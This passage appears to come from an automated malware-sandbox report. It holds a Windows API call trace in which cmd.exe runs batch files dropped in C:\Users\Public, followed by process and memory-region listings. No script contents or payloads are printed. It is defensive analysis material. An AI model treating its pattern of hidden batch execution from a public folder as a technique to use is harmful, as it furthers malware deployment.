lpFileName="C:\\Users\\Public\\UKO.bat", fInfoLevelId=0x1, lpFindFileData=0x1828d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1828d0) returned 0x5c8618 [0131.232] GetProcessHeap () returned 0x5b0000 [0131.232] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5b75c0, Size=0x4) returned 0x5b0cf0 [0131.232] FindClose (in: hFindFile=0x5c8618 | out: hFindFile=0x5c8618) returned 1 [0131.233] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0131.233] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0131.233] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0131.233] _vsnwprintf (in: _Buffer=0x18f2a8, _BufferCount=0x1fff, _Format=" /K %s", _ArgList=0x182d84 | out: _Buffer=" /K C:\\Users\\Public\\UKO.bat") returned 27 [0131.233] _wcsicmp (_String1=" /K C:\\Users\\Public\\UKO.bat", _String2=" /K ") returned 99 [0131.233] GetStartupInfoW (in: lpStartupInfo=0x182e28 | out: lpStartupInfo=0x182e28*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.233] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x182dc4 | out: lpAttributeList=0x0, lpSize=0x182dc4) returned 0 [0131.233] GetLastError () returned 0x7a [0131.233] GetProcessHeap () returned 0x5b0000 [0131.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5b0a10 [0131.233] InitializeProcThreadAttributeList (in: lpAttributeList=0x5b0a10, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x182dc4 | out: lpAttributeList=0x5b0a10, lpSize=0x182dc4) returned 1 [0131.233] UpdateProcThreadAttribute (in: lpAttributeList=0x5b0a10, dwFlags=0x0, Attribute=0x60001, lpValue=0x182ddc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5b0a10, lpPreviousValue=0x0) returned 1 [0131.233] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /K C:\\Users\\Public\\UKO.bat", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x182de0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0x3c, hStdError=0x40), lpProcessInformation=0x182dcc | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /K C:\\Users\\Public\\UKO.bat", lpProcessInformation=0x182dcc*(hProcess=0xb0, hThread=0xb4, dwProcessId=0xf24, dwThreadId=0x1348)) returned 1 [0131.251] DeleteProcThreadAttributeList (in: lpAttributeList=0x5b0a10 | out: lpAttributeList=0x5b0a10) [0131.251] GetProcessHeap () returned 0x5b0000 [0131.251] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b0a10) returned 1 [0131.252] GetLastError () returned 0x7a [0131.252] ResumeThread (hThread=0xb4) returned 0x0 [0131.252] CloseHandle (hObject=0xb4) returned 1 [0131.252] CloseHandle (hObject=0xb0) returned 1 [0131.252] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.252] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0132.385] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.385] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x107f40c | out: lpMode=0x107f40c) returned 1 [0135.428] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.428] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x107f408 | out: lpMode=0x107f408) returned 1 [0135.552] SetConsoleInputExeNameW () returned 0x1 [0135.553] GetConsoleOutputCP () returned 0x1b5 [0136.117] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x107f460 | out: lpCPInfo=0x107f460) returned 1 [0136.117] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.173] CreateFileW (lpFileName="C:\\Users\\Public\\Trast.bat" (normalized: "c:\\users\\public\\trast.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0136.174] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0136.174] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.174] SetFilePointer (in: hFile=0xb0, lDistanceToMove=34, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c8598) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c8560) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b0b48) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c8520) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c84c8) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c8478) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b0710) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b76c0) returned 1 [0136.174] GetProcessHeap () returned 0x5b0000 [0136.174] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5c8418) returned 1 [0136.174] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.175] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0136.175] ReadFile (in: hFile=0xb0, lpBuffer=0x108b960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f6c4, lpOverlapped=0x0 | out: lpBuffer=0x108b960*, lpNumberOfBytesRead=0x19f6c4*=0x0, lpOverlapped=0x0) returned 1 [0136.175] GetLastError () returned 0x0 [0136.175] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.175] GetFileType (hFile=0xb0) returned 0x1 [0136.175] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.175] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0136.175] GetProcessHeap () returned 0x5b0000 [0136.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbfd8 [0136.175] GetProcessHeap () returned 0x5b0000 [0136.175] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0136.176] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.176] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0136.176] ReadFile (in: hFile=0xb0, lpBuffer=0x108b960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f6c4, lpOverlapped=0x0 | out: lpBuffer=0x108b960*, lpNumberOfBytesRead=0x19f6c4*=0x0, lpOverlapped=0x0) returned 1 [0136.176] GetLastError () returned 0x0 [0136.176] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.176] GetFileType (hFile=0xb0) returned 0x1 [0136.176] _get_osfhandle (_FileHandle=3) returned 0xb0 [0136.176] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0136.176] GetProcessHeap () returned 0x5b0000 [0136.176] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbfd8 [0136.176] GetProcessHeap () returned 0x5b0000 [0136.176] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0136.176] longjmp () [0136.176] _tell (_FileHandle=3) returned 34 [0136.176] _close (_FileHandle=3) returned 0 [0136.177] CmdBatNotificationStub () returned 0x1 [0136.177] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.177] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) Thread: id = 21 os_tid = 0x2e8 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1c58d000" os_pid = "0x9f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x814" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 484 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 485 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 486 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 487 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 488 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 489 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 490 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 491 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 492 start_va = 0x7ff747c50000 end_va = 0x7ff747c60fff monitored = 0 entry_point = 0x7ff747c516b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 493 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 507 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 508 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 509 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 510 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 511 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 512 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 513 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 514 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 515 start_va = 0x8d0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 516 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 517 start_va = 0x7ffc451d0000 end_va = 0x7ffc45228fff monitored = 0 entry_point = 0x7ffc451dfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 518 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 519 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 520 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 521 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 522 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 523 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 524 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 525 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 526 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 527 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 528 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 529 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 530 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 531 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 532 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 533 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 534 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 535 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 536 start_va = 0x1ed0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 537 start_va = 0x790000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 538 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 539 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 540 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 541 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 542 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 543 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 562 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 568 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 569 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 570 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 578 start_va = 0x1f60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 592 start_va = 0x2160000 end_va = 0x2496fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 596 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 597 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 598 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 599 start_va = 0xa60000 end_va = 0xab9fff monitored = 1 entry_point = 0xa753f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 607 start_va = 0x24a0000 end_va = 0x26b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 608 start_va = 0x26c0000 end_va = 0x28d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 610 start_va = 0x1f60000 end_va = 0x2074fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 611 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 612 start_va = 0x28e0000 end_va = 0x2af4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 613 start_va = 0x2b00000 end_va = 0x2c08fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 614 start_va = 0xa60000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 615 start_va = 0x7ffc5eac0000 end_va = 0x7ffc5ec19fff monitored = 0 entry_point = 0x7ffc5eb038e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 622 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 623 start_va = 0x2080000 end_va = 0x213bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 624 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 625 start_va = 0x7ffc59dc0000 end_va = 0x7ffc59de1fff monitored = 0 entry_point = 0x7ffc59dc1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 634 start_va = 0x7ffc5a2c0000 end_va = 0x7ffc5a2d2fff monitored = 0 entry_point = 0x7ffc5a2c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 636 start_va = 0x7ffc5bc40000 end_va = 0x7ffc5bc95fff monitored = 0 entry_point = 0x7ffc5bc50bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 637 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 638 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 639 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 640 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 641 start_va = 0xaa0000 end_va = 0xaa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 642 start_va = 0xab0000 end_va = 0xab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 643 start_va = 0x7ffc52e60000 end_va = 0x7ffc530d3fff monitored = 0 entry_point = 0x7ffc52ed0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 651 start_va = 0x1ed0000 end_va = 0x1ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 652 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 653 start_va = 0x1ee0000 end_va = 0x1ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Thread: id = 12 os_tid = 0x680 Thread: id = 13 os_tid = 0x740 Thread: id = 14 os_tid = 0x5f8 Thread: id = 19 os_tid = 0x12a8 Process: id = "5" image_name = "secinit.exe" filename = "c:\\windows\\syswow64\\secinit.exe" page_root = "0x277e1000" os_pid = "0x4a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x738" cmd_line = "\"C:\\Windows\\System32\\secinit.exe\"" cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "6" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x49a53000" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x738" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1848 -s 256" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 